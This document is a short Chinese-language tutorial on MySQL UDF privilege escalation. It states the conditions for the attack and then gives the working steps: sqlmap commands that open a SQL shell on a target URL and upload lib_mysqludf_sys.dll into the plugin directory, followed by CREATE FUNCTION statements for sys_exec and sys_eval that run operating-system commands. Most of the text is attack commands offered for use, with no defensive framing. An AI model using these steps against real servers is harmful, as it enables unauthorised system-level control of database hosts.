udf提权
1.原理
UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限
2.利用条件
Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。
Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于
c:winntsystem32。
掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,
具备`root账号所具备的权限的其它账号也可以。
可以将udf.dll写入到相应目录的权限。
1.连接mysql数据打开一个交互shell:
sqlmap.py -u "url" --sql-shell
select @@version;
select @@plugin_dir;
C:XXXX\mysql\mysql5.6.17\lib\plugin\
2.利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:
sqlmap.py -u "url" --file-write=自己的目录/lib_mysqludf_sys.dll --file-dest=C:XXXX\\mysql\mysql5.6.17\lib\plugin\lib_mysqludf_sys.dll
CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
select sys_eval('ver');